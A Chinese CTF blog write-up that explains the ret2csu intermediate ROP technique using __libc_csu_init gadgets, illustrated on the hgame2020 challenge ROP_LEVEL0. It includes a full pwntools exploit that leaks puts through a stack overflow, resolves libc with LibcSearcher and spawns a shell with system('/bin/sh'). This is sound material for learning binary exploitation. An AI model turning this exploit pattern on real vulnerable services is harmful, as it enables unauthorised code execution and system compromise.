栈溢出总结之中级ROP

最新推荐文章于 2023-05-18 10:54:05 发布
最新推荐文章于 2023-05-18 10:54:05 发布
阅读量316 收藏
点赞数
分类专栏: 栈溢出 ret2csu hgame ROP_LEVEL0
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45097188/article/details/104578758
版权

ret2csu

原理:
(所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。)

在64位程序中,函数的前6个参数是通过寄存器传递的,但是大多时候,我们很难找到每一个寄存器对应的gadgets。而这时我们就可以利用x64下的 __libc_csu_init中的gadgets。这个函数是用来对libc进行初始化操作的,而一般的程序都会调用libc函数,所以这个函数是一定存在的。不同版本的 libc_csu_init有一定的区别。
在这里插入图片描述
在这里插入图片描述
我们可以利用多的点:
1、从0x40074A到结尾,我们可以利用栈溢出构造栈上数据来控制rbx,rbp,r12,r13,r14,r15寄存器的数据。
2、从0x400730到0x400739,我们可以将r13赋给rdx,将r14赋给rsi,将r15d赋给edi,而这三个寄存器,也是x64函数调用中传递的前三个寄存器。此外,如果我们可以合理的控制r12和rbx,那么我们就可以调用我们想要调用的函数。比如我们可以控制rbx为0,r12存储为我们想要调用的函数地址。
3、从0x400730到0x400744,我们可以控制rbx与rbp的之间的关系为rbx+1=rbp,这样我们就不会执行loc_400730,进而可以继续执行下面的汇编程序。这里我们可以简单的设置rbx=0,rbp=1。

例子:
(原题为hgame2020的ROP_LEVEL0)
64位程序,只开启的NX堆栈不可执行保护。
主函数:一个简单的栈溢出漏洞。
在这里插入图片描述
浏览程序后,发现并没有system函数地址,也没有/bin/sh字符串。所以我们要泄露libc函数的从而拿到system函数和/bin/sh字符串真正的地址。
但是我们又发现了vuln函数,并且其存在栈溢出漏洞。
在这里插入图片描述

我们看到主函数的第一个read处只能溢出0x10个字节,即两个地址。当发现vuln函数中的read函数可以溢出大量地址。所以我们可以利用主函数中的第一个read函数的返回地址为vuln从而利用vuln中的read泄露libc地址。
思路:
1、通过read函数调用vuln函数。
2、利用栈溢出执行libc_csu_gadgets泄露puts函数的got表,获取puts函数地址,并使程序重新返回vuln函数。
3、根据libcsearcher获取对应libc版本及system函数地址以及/bin/sh地址。
4、再次利用栈溢出执行system(’/bin/sh’)获取shell。

exp:

from pwn import *
from LibcSearcher import*
#context.log_level='debug'
elf=ELF('./ROP_LEVEL0')
p=process('./ROP_LEVEL0')

puts_got=elf.got['puts']
log.success('puts_got => {}'.format(hex(puts_got)))
padding='a'*0x50+'a'*8
vuln_addr=elf.symbols['vuln']
payload1=padding+p64(vuln_addr)
p.sendline(payload1)

csu_front_add=0x400730
csu_end_add=0x40074A
pop_rdi_ret=0x400753

def csu(rbx, rbp, r12, r13, r14, r15, last):
    # pop rbx,rbp,r12,r13,r14,r15
    # rbx should be 0,
    # rbp should be 1,enable not to jump
    # r12 should be the function we want to call
    # rdi=edi=r15d
    # rsi=r14
    # rdx=r13
    payload = 'a' * 0x18
    payload += p64(csu_end_add) + p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
    payload += p64(csu_front_add)
    payload += p64(last)*8
    p.sendline(payload)

csu(0,1,puts_got,puts_got,puts_got,puts_got,vuln_addr)
p.recvline()
puts_add = u64(str(p.recv(6)+'\x00\x00'))
log.success('puts_add => {}'.format(hex(puts_add)))

obj=LibcSearcher('puts',puts_add)
puts_offset=obj.dump('puts')
system_offset=obj.dump('system')
bin_sh_offset=obj.dump('str_bin_sh')
puts_base=puts_add-puts_offset
log.success('puts_base => {}'.format(hex(puts_base)))

system_add=puts_base+system_offset
bin_sh_add=puts_base+bin_sh_offset
log.success('system_add => {}'.format(hex(system_add)))
log.success('bin_sh_add => {}'.format(hex(bin_sh_add)))

payload2='a'*0x18+p64(pop_rdi_ret)+p64(bin_sh_add)+p64(system_add)
p.sendline(payload2)
p.interactive()
Eternalstay
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
栈溢出基础——ROP1.0的例题
07-13
几个pwn的入门题
栈溢出----中级ROP
qq_42192672的博客
10-21 551
学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/medium_rop/ 1.ret2__libc_csu_init 这个主要是争对64位的程序的,和32位的栈传参不同的是,在 64 位程序中,函数的前 6 个参数是通过寄存器传递的,最完美的情况,肯定是需要的寄存器可以通过ROPgadgets找到合适的,但是总有找...
中级ROP
m0_49959202的博客
09-23 440
文章目录中级ROP1.原理1.1 ret2csu1.1.1 libc_csu_init展示1.1.2 可用gadget介绍1.1.3 组合使用gadget思路1.1.4 类似于libc_csu_init,其他可用的gadget1.1.5 利用libc_csu_init尾部偏移,控制其他寄存器1.2 ret2reg1.2.1 原理1.2.2 防御方法1.3 BROP1.3.1 概念1.3.2 攻击条件1.3.3 攻击原理1.3.3.1 栈溢出长度1.3.3.2 Stack Reading1.3.3.3 Bli
中级 rop
weixin_55885866的博客
05-18 65
第一步:利用write()输出write在内存中的地址。gadget是call qword ptr [r12+rbx*8],所以应该使用write.got的地址而不是write.plt的地址。并且为了返回到原程序中,重复利用buffer overflow的漏洞,我们需要继续覆盖栈上的数据,直到把返回值覆盖成目标函数的main函数为止。链接:https://www.jianshu.com/p/187798890345。商业转载请联系作者获得授权,非商业转载请注明出处。作者:Queen_耳又又。
栈溢出总结之基础ROP
weixin_45097188的博客
02-28 535
ret2text 原理:ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。 这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。 例子 仅开了NX栈不可执行保护...
中级ROP之ret2reg
至臻求学,胸怀云月
02-23 2838
ret2reg 原理 查看栈溢出返回时哪个寄存器指向缓冲区空间。 查找对应的call 寄存器或者jmp 寄存器指令,将EIP设置为该指令地址。 将寄存器所指向的空间上注入shellcode(确保该空间是可以执行的,通常是栈上的) 利用思路 分析和调试汇编,查看溢出函数返回时哪个寄存器指向缓冲区地址 向寄存器指向的缓冲区中注入shellcode 查找call 该寄存器或者jmp 该寄存器指令,...
rop轻松谈.pdf
10-21
rop基础
rop开放平台
04-12
rop开放平台s
rop-master.rar
11-04
RopRop 是 Rapid Open PlatformRapid Open Platform Rapid Open Platform Rapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open ...
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
pwn学习-中级ROP-1
WocW的博客
03-03 916
CTF-wiki-中级ROP实例复现 ret2csu libc_csu_init函数 ctf-wiki上的 .text:00000000004005C0 ; void _libc_csu_init(void) .text:00000000004005C0 public __libc_csu_init .text:00000000004005C0 __l...
pwn学习-中级ROP-BROP
WocW的博客
03-06 862
实例复现 先与程序交互 这里直接用本地服务器模拟远程的,但实际上不对原文件进行逆向分析。 其中asdasd为我任意输入的password,可以看出程序的基本交互。这里我们开始 爆破出buffer的长度 exp from pwn import * from LibcSearcher import LibcSearcher def getBufferLength(): i...
pwn中级ROP——ret2csu
turtlesd的博客
04-27 763
地址 栈中数据 return前 a * 136 main函数return(rsp) 0x400606(gadget1) rsp + 8 0(填充数据) rsp + 16(rbx) 0 rsp + 24(rbp) 1 rsp + 32(r12) write_got_addr rsp + 40(r13) 1 rsp + 48(r14) write_got_addr rsp + 56(r15) 8 gadget1的return 0x4005F0(gadget2)...
Android 栈溢出攻击—[3]ROP 浅析
杏林小轩
01-03 1410
在缓冲区溢出攻击攻防发展过程中ROP技术作为对抗XN的利用技术,一直发挥着重要的作用,在很多漏洞中其都是关键的攻击手段。本文通过一个简单的例子来对Android的ARM平台下ROP技术做一个简单的分析。
中级ROP之BROP
至臻求学,胸怀云月
02-25 3063
Blind ROP 基本介绍 于2014年提出,论文题目名为Hacking Blind,BROP是指在没有对应应用程序的源代码或者二进制文件的情况下,对程序进行攻击,劫持程序的执行流。 攻击条件 源程序必须存在栈溢出漏洞,以便于攻击者可以控制程序流程。 服务器端的进程在崩溃之后会重新启动,并且重新启动的进程的地址与先前的地址一样,目前nginx,mysql,apache,openssh等服务器应...
栈溢出学习总结
qq_36386435的博客
06-17 228
栈溢出 前言         距离上一次发博客挺长时间了,没时间,隔一段时间总结一波也可以,CTF中的漏洞挖掘与利用学习,也就是pwn,通常是用ctfwiki来学习的,里面的内容确实可以,但是入门总感觉看起来太枯燥了,当前学习了栈溢出漏洞,整数溢出漏洞,格式化字符串漏洞,条件竞争漏洞,还有堆结构的学习,还未做一些利用堆的题,除了栈溢出漏洞,其他我都是跟着ctfwiki来的,栈溢出漏洞,我觉得ctfwiki上太多了,太枯燥了,就直
rop [ 一] 栈溢出和简单ROP思路
令则
02-02 2970
ROP ROP即返回导向的编程 我认为就是不断的去思考代码的作用和计算位置,调试中一步步确定下的代码,这样的手段用于在一个已经成型的程序上调试并写出利用代码,是一种攻击技术 这一篇是结合经典文档:《蒸米的一步步学ROP》自己的笔记 排布首先是栈溢出的简述,然后就是按照攻击的思路去划分出的知识框架。 文章目录ROP栈溢出栈帧:程序运行流程漏洞利用修改ret后门函数ELF中查找函数参数传递32...
栈溢出学习(三)之简单ROP
Pz_mstr's Blog
03-27 963
前言 栈溢出学习(三),针对一个例子,进行各种栈溢出技术的练习。 系列文章 栈溢出学习(一) 栈溢出学习(二) 本文属于新手实验难度,过程比较详细,适合新手学习 样例代码 本文使用的代码如下 #include <stdio.h> #include <stdlib.h> #include <string.h> /* * compiled with: * ...
无保护栈 | 基本ROP(更新中)
Ph4ntom的一亩三分地
12-25 190
无保护栈 | 基本ROP ROP主要是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而改变指令流的执行顺序。 如果一个程序能够向栈上写入数据,并且写入的数据大小没有被良好地控制,那么这个程序就有可能存在栈溢出漏洞。 比如,在一份只开启NX保护的ELF文件中有下面的代码: int __cdecl main(int argc, const char **argv, const char **envp) { write(1, "Hello, World\n
vs2022-栈溢出
最新发布
10-30
栈溢出是一种常见的安全漏洞,它通常发生在程序试图向栈中写入超过其分配的内存空间的数据时。攻击者可以利用这种漏洞来覆盖返回地址,从而控制程序的执行流程。在VS2022中,可以通过以下几个步骤来防止栈溢出漏洞的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值